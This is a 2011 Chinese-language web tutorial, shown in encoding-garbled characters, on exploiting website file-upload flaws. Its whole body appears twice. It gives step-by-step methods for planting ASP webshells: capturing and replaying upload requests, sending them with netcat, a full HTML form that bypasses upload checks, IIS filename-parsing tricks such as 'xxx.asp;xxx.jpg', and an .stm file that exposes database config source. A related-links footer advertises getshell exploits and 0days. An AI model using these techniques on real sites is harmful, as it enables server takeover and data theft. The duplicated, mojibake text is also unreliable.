腳本入侵-上傳漏洞總結(jié)篇(臭小子)
發(fā)布時(shí)間:2011-04-24 15:44:59 作者:佚名
我要評(píng)論

腳本入侵-上傳漏洞總結(jié)篇(臭小子),從事于網(wǎng)站開發(fā)的程序員要看下,不要讓自己的程序別黑客利用。
1:抓包上傳
我們可以用WSockExpert(抓包工具) hkcpost抓包提交軟件或等等抓包工具
說下hkcpost有時(shí)候電腦打不開WSockExpert(抓包工具) 我們就用這工具
很好用
說到抓包上傳 比如一個(gè)上傳地址http://site/upload.asp
或后臺(tái)管理后臺(tái)上傳地址
我們就抓包c(diǎn)ookies 參數(shù) 和文件上傳成功地址
然后用明小子或等等抓包工具 上傳。大家可以去百度搜索相關(guān)的教程和文章看看
2:抓包和nc上傳
抓包c(diǎn)ookies 參數(shù) 和文件的數(shù)據(jù) 然后保存成文本 比如hack92.txt
然后用編譯C32asm 或等等編譯工具 修改
然后用nc.exe 提交 命令nc -vv site 80<hack92.txt
大家可以去百度搜索下nc上傳 或突破 等等教程文章看
3:本地上傳漏洞
把下面的代碼 保存為hack92.html
------------------------------
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="把上傳地址復(fù)制這里到這里" method=post
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上傳 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
------------------------------------------
添加上傳地址
把<FORM name=form1 action="把上傳地址復(fù)制這里到這里" method=post
把:把上傳地址復(fù)制這里到這里 你的上傳地址
然后打開hack92.html 出現(xiàn)兩個(gè)頁面 第一個(gè)上你的圖片木馬 然后在上你的ASP木馬
提示在上asp木馬記得 加個(gè)空格
4:iis漏洞
把我們的asp木馬 改成xxx.asp;xxx.jpg 或xxx.asp.jpg
或建立asp.asp asa.asa 目錄 上圖片asp木馬
5:上傳突破
當(dāng)網(wǎng)站不允許上傳asp .. cer ..cdx . htr 等文件時(shí),上傳一個(gè)stm文件,代碼為 “”(想查看什么文件就寫什么文件名,這里我假設(shè)想查看的文件名為”conn.asp”),,然后直接打開這個(gè)stm文件的地址,再查看源代碼,“conn.asp”這個(gè)文件的代碼就一覽無遺了!
大家可以去百度搜索相關(guān)的文章和教程
我們可以用WSockExpert(抓包工具) hkcpost抓包提交軟件或等等抓包工具
說下hkcpost有時(shí)候電腦打不開WSockExpert(抓包工具) 我們就用這工具
很好用
說到抓包上傳 比如一個(gè)上傳地址http://site/upload.asp
或后臺(tái)管理后臺(tái)上傳地址
我們就抓包c(diǎn)ookies 參數(shù) 和文件上傳成功地址
然后用明小子或等等抓包工具 上傳。大家可以去百度搜索相關(guān)的教程和文章看看
2:抓包和nc上傳
抓包c(diǎn)ookies 參數(shù) 和文件的數(shù)據(jù) 然后保存成文本 比如hack92.txt
然后用編譯C32asm 或等等編譯工具 修改
然后用nc.exe 提交 命令nc -vv site 80<hack92.txt
大家可以去百度搜索下nc上傳 或突破 等等教程文章看
3:本地上傳漏洞
把下面的代碼 保存為hack92.html
------------------------------
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="把上傳地址復(fù)制這里到這里" method=post
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上傳 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
------------------------------------------
添加上傳地址
把<FORM name=form1 action="把上傳地址復(fù)制這里到這里" method=post
把:把上傳地址復(fù)制這里到這里 你的上傳地址
然后打開hack92.html 出現(xiàn)兩個(gè)頁面 第一個(gè)上你的圖片木馬 然后在上你的ASP木馬
提示在上asp木馬記得 加個(gè)空格
4:iis漏洞
把我們的asp木馬 改成xxx.asp;xxx.jpg 或xxx.asp.jpg
或建立asp.asp asa.asa 目錄 上圖片asp木馬
5:上傳突破
當(dāng)網(wǎng)站不允許上傳asp .. cer ..cdx . htr 等文件時(shí),上傳一個(gè)stm文件,代碼為 “”(想查看什么文件就寫什么文件名,這里我假設(shè)想查看的文件名為”conn.asp”),,然后直接打開這個(gè)stm文件的地址,再查看源代碼,“conn.asp”這個(gè)文件的代碼就一覽無遺了!
大家可以去百度搜索相關(guān)的文章和教程
相關(guān)文章
- 最近看到網(wǎng)上曝出的dedecms最新版本的一個(gè)注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開.但是在我實(shí)際測試過程當(dāng)中,發(fā)現(xiàn)無法復(fù)現(xiàn)2013-06-11
- 春節(jié)呆在家里上網(wǎng),我表哥突然找我說要一個(gè)DJ網(wǎng)站的VIP會(huì)員,說搞定后請我吃KFC,于是就答應(yīng)了。2011-03-22
DEDECMS 爆嚴(yán)重安全漏洞 免賬號(hào)密碼直接進(jìn)入后臺(tái)
眾所周知,因使用簡單、客戶群多,織夢CMS一直被爆出許多漏洞。今天小編在群里得到織夢官方論壇某版主可靠消息:DEDECMS爆嚴(yán)重安全漏洞,近期官方會(huì)發(fā)布相關(guān)補(bǔ)丁,望大家及2011-08-20- 腳本入侵-ASP網(wǎng)站入侵一些技巧 先說明下 先看下是不是html轉(zhuǎn)的asp生成的站2011-04-24
Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法
這篇文章主要為大家介紹了Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法,對(duì)于網(wǎng)絡(luò)安全而言非常重要!需要的朋友可以參考下2014-07-05訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說明
訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說明,使用訊時(shí)網(wǎng)站管理系統(tǒng)的朋友可以參考下。2011-07-15- 手工注入方法,方便大家測試程序漏洞,本人只供學(xué)習(xí)交流,不建議搞破壞。2011-11-03
phpcms2008 代碼執(zhí)行 批量getshell EXP(使用菜刀)
這篇文章主要介紹了phpcms2008 代碼執(zhí)行 批量getshell EXP的相關(guān)資料,需要的朋友可以參考下2014-05-09- php后臺(tái)插一句話的思路加114網(wǎng)址導(dǎo)航后臺(tái)拿webshell的方法。2011-09-29
- DDos攻擊是現(xiàn)在大部分用戶最喜歡的一個(gè)話題,近兩年來發(fā)展態(tài)勢也漸趨平緩,歐洲反垃圾郵件組織Spamhaus突然遭受到高達(dá)300Gbps的大流量DDos攻擊被認(rèn)為是史上最大DDoS攻擊,2016-09-20